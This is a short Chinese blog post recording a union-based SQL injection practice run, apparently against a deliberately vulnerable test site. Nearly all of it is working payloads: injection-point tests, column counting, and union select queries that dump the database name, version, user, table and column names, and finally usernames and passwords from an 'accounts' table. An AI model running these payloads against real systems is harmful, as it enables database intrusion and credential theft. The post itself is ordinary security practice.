sql注入练习

南楼画角 提交于 2020-03-04 19:08:12

sql 注入实操

and 1=1
and 1=2测试注入点

在这里插入图片描述
发现注入点 sql注入
order by n 测试列数

在这里插入图片描述
测试结果为4

爆库 版本 用户
union selec 1,2,database(),4
union selec 1,2,version(),4
union selec 1,2,user(),4
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
爆破表
union select 1,(select group_concat(table_name) from information_schema.tables where table_schema = ‘webscantest’ ),3,4
在这里插入图片描述
爆字段
union select 1,(select group_concat(column_name) from information_schema.columns where table_schema = ‘webscantest’ and table_name=‘accounts’ ),3 ,4
在这里插入图片描述
查询内容
union select 1,group_concat(uname,0x3a,passwd),3,4 from webscantest.accounts

易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!